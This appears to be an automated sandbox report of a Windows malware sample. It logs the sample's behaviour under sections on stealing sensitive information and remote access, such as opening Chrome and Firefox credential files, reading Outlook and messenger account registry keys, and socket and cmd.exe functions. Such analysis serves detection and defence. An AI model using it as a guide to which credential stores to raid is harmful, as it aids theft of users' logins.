Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D25007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_00D25007
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D3215F GetUserNameW, 5_2_00D3215F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D240BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 5_2_00D240BA
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00CF4AFE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Source: C:\Windows\SysWOW64\svchost.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 7_2_0040BA4D
Source: C:\Windows\SysWOW64\svchost.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: \key3.db 7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3704, type: MEMORYSTR
Source: name.exe Binary or memory string: WIN_81
Source: name.exe Binary or memory string: WIN_XP
Source: name.exe Binary or memory string: WIN_XPe
Source: name.exe Binary or memory string: WIN_VISTA
Source: name.exe Binary or memory string: WIN_7
Source: name.exe Binary or memory string: WIN_8
Source: taskhostw[1].exe.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Source: C:\Windows\SysWOW64\svchost.exe Code function: cmd.exe 7_2_0040569A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D66399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 5_2_00D66399
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 5_2_00D6685D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_01406399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 6_2_01406399
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0140685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_0140685D